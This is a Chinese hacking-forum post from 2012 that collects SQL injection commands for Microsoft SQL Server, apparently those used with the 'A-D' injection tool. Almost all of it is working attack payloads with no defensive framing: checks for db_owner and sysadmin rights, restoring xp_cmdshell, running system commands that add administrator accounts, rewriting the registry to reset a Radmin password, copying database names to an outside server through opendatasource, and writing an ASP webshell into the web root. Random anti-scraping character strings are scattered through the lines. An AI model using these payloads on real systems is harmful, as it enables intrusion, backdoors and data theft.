找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1960|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令5 D$ |2 h' W2 b3 W# q
//看看是什么权限的
! a8 J) C4 p, @# @. u  pand 1=(Select IS_MEMBER('db_owner'))
. ~$ e$ ?& b6 [( Z1 G  QAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
9 e! R' ?# b5 [/ Z( A0 L: `% {0 M4 b! j2 T" F* Z
//检测是否有读取某数据库的权限1 P0 Z; s- o  s) S* k/ o) Y$ l$ E
and 1= (Select HAS_DBACCESS('master'))
" w! h* |6 D  Q% K' j; gAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --( H* J2 W' B% p+ }8 \& `
. z8 A' P( j3 c# |
6 B7 ^1 v2 \1 l" V) ?4 ]4 F
数字类型; N& r5 t! V2 E/ `& A- B
and char(124)%2Buser%2Bchar(124)=0
9 L+ V- \' z- B3 @% r
+ K5 {4 i# V; h5 x+ _( D字符类型  I7 k" L0 a) `' |) l, I+ v
' and char(124)%2Buser%2Bchar(124)=0 and ''='& u% `( ]: y8 P- Q# {
9 l6 }. a5 B4 n+ T! v
搜索类型
, C( ]  @) e# c6 y  T& i' and char(124)%2Buser%2Bchar(124)=0 and '%'='* K7 N. S2 `9 L0 \0 O
" @" Z$ R- n% d% ~8 H! Z: m
爆用户名
; L) M! A" `# d* Nand user>06 I2 {9 Y! p$ E9 n8 L/ q3 }  Z! L
' and user>0 and ''='% ~+ G* R! I9 T: i

' F6 c" h$ H" Q检测是否为SA权限
+ Z7 k! b" T" p2 b* ]% `$ Mand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
0 |0 F9 V/ {! m$ B0 mAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" L# |. y! o) D$ `! G  }

5 a  u4 {+ E' c6 m- B检测是不是MSSQL数据库8 n- Z( e4 f5 i4 N
and exists (select * from sysobjects);--
/ Y. a& [& P% \2 A5 f5 v: `2 Q) c" [
检测是否支持多行5 K8 t: r% ~' f; A
;declare @d int;-- . y. W1 `& u+ m$ v& y
) j' Z! ]3 V) m4 R; _
恢复 xp_cmdshell
3 ~  K" B( A* t( w. C0 f9 }/ s;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
+ ^. B& I. o9 w- p5 v1 A0 {0 e. ?1 s

& G1 ]' V; D# K- u$ `select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
0 m1 `; l+ t! I- V4 q1 |+ m% E7 S7 q7 P& c: p5 M
//------------------------ N3 t1 g4 t7 e" c3 {0 @! t
//      执行命令
  W; [" h$ |7 y4 }. d7 N//-----------------------
/ N8 h% ^: T! R5 K( p首先开启沙盘模式:
# T! {2 ]$ b* `$ H, Dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1- m9 k# X) t/ q: U" N

; @  O; N3 _. ~7 w2 e: o然后利用jet.oledb执行系统命令% A7 B" U2 D6 U* L/ d
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
! H6 b! P! `: B$ Q2 h- f5 S$ Y4 y) r
7 p# H, f, @7 V: [1 N+ A2 D2 Z' W; j! _执行命令3 q; e$ j7 p0 ]% u- I; o- ~/ U! W
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
) M* ^; ^" A, C+ j( t  e
' S, w: S/ e5 s. M* YEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111', \, ^  r2 X( A# K0 R8 a2 ?7 R4 o5 l# {
* |, O, p' e* y
判断xp_cmdshell扩展存储过程是否存在:
- ~+ X$ R5 M( \# zhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')" i! E# |  n3 l# {
. ~. m5 ^7 C+ \( v
写注册表
2 b* E, ~5 t" ]% ]exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1* ^/ g" T3 |7 p* N

9 W. S8 [0 o( }( mREG_SZ7 S4 E7 F  C% |+ E

& b  g8 E+ G) e8 |) m6 Z读注册表
0 f  @$ c9 w% ]% Q2 E7 Zexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
; q, w! }: G6 x* ?( `* I. k9 J/ g  V7 t) `5 T
读取目录内容
: \% x# X! A5 P$ b: rexec master..xp_dirtree 'c:\winnt\system32\',1,1
: U$ D. L+ f2 K$ R+ a
+ }0 H% l! M  u; e5 U3 u- b* W2 {1 S  e3 D5 B# Y/ M* u
数据库备份
, |5 ], }. X; U3 zbackup database pubs to disk = 'c:\123.bak'! y7 e% l/ [! p3 I# z% ]

1 s, {( C/ T. r( a: I/ r' W6 i//爆出长度* P8 C8 C) g: [: w0 m6 ]
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--; c$ U7 l% A% [1 z# _3 X# l
0 |2 ~2 G2 G# k7 p6 T" d1 \

5 u7 m% Y7 b# N3 [4 E5 o
. i) Z3 s" f4 Y4 Q; y2 y% A更改sa口令方法:用sql综合利用工具连接后,执行命令:
8 Z2 g3 ?# s' W% _6 ^exec sp_password NULL,'新密码','sa'1 c/ E2 p) x! Y& F9 ^8 y, R' o6 l
/ e, Y2 C/ u$ j" ~; b8 v! k
添加和删除一个SA权限的用户test:3 h7 ?! v& ~9 k) Z7 _6 n, Z; G3 u
exec master.dbo.sp_addlogin test,ptlove/ P( O; D  D! X& G
exec master.dbo.sp_addsrvrolemember test,sysadmin0 g. u( a: g4 @
" V' i# t* `" U' W( k
删除扩展存储过过程xp_cmdshell的语句: # W, v( M( C, E# E" q" m7 H9 p
exec sp_dropextendedproc 'xp_cmdshell'. n6 Q# I2 L* {

& j* f2 f, D, L添加扩展存储过过程$ a: ], u5 B: H' w) u5 Q2 q7 O# v
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' ( ~) d5 ]0 Q' |8 Q9 J$ J: z: S" r  Y9 }
GRANT exec On xp_proxiedadata TO public
0 a0 J6 T+ y: O" S
$ r' F& r& E# |0 i! y/ R% d% e6 m2 v6 y3 z! M
停掉或激活某个服务。
9 _# p9 o, g/ R* S
3 f5 k1 }, i6 D% i  P/ Zexec master..xp_servicecontrol 'stop','schedule'  W: Q+ e& }- X% ^( G, e" Z; T  d
exec master..xp_servicecontrol 'start','schedule': a  P# R2 K+ k/ X
2 b7 U  ~4 U) R! n) p/ t
dbo.xp_subdirs) S7 @  e" K( w% v

7 C8 Z7 R" [9 _+ c3 M只列某个目录下的子目录。
. G9 J+ x7 A, ^+ I. E5 r; H9 u7 Qxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'6 P, r' w" R% N
7 @. g: K8 `0 J  \7 |
dbo.xp_makecab
: n6 z6 d$ H5 p3 T  Z' `5 n
. y* p9 y$ |5 @7 K  F2 U将目标多个档案压缩到某个目标档案之内。
5 V9 T& H. H- p7 ]3 I2 p所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。( x( X4 c9 T$ _4 F. u
- L$ W0 S9 W, g4 k
dbo.xp_makecab
5 N0 V7 p. O9 M: H'c:\test.cab','mszip',1,7 p$ S/ X* ~4 c4 e' f5 B6 ]
'C:\Inetpub\wwwroot\SQLInject\login.asp',
2 D% H4 I% m, e0 C'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'0 p- C, U: r8 N, N5 B

, j* [8 C  L4 m4 \; u# exp_terminate_process
  F8 k7 T$ ]+ h  A- t4 `4 l/ e
( A# `9 ?& W$ n4 C, Q0 x停掉某个执行中的程序,但赋予的参数是 Process ID。; s$ K" A' D- ]" P) q
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
* W/ V9 h% U$ l- d
; M& P( `( Y6 {! ~( M% P! Qxp_terminate_process 2484
) e( l9 ~( d, Y. C' _4 B7 l8 F" _9 V2 }% o5 J8 x7 I2 j
xp_unpackcab
4 p, w6 R5 n/ n4 ]' F
  D3 `( W! w+ n1 ?2 n* D3 E9 O解开压缩档。
$ h0 K- o+ \/ Z  O2 i/ u# y, i* g7 N5 v
xp_unpackcab 'c:\test.cab','c:\temp',1: E! _( ?! g+ g* C' O

7 [, t) c+ h% c7 S, p6 e! K
) X. H) T5 S. L某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12349 ?+ Q1 g; j! \+ k- j. t
5 u  N# k, r' Y4 S$ n
create database lcx;
/ H. n, F& M- k& X: UCreate TABLE ku(name nvarchar(256) null);
! Y$ U* t% e8 A) |Create TABLE biao(id int NULL,name nvarchar(256) null);0 Q' K) y; F3 m. [4 p5 M  i

" X7 h$ j" D9 k- w//得到数据库名" I' B: }+ C  t
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
* x. G1 X: L. Q, s* o
) d, p) |+ O  f" B: {. W. o4 y" K
' e1 s) m8 z* i6 `3 j//在Master中创建表,看看权限怎样/ y" o1 t! T4 G& P, k. P
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
$ v* x# G  |) c- \: v9 i3 D
3 a( z) |, K; g' @8 A, u  ?用 sp_makewebtask直接在web目录里写入一句话马:
- }% m3 D- C$ U4 Ahttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--# _& ]" w; h' J8 I+ ~' Y

6 E8 Q8 y5 r; V$ H  k2 s//更新表内容
: h' |' X% O  d. _7 b3 {Update films SET kind = 'Dramatic' Where id = 123% z$ @6 `& ~$ ~, {: w
" W9 a$ j+ p" i3 t. v: y3 w
//删除内容4 p1 ]- y  ^% W7 }* U
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表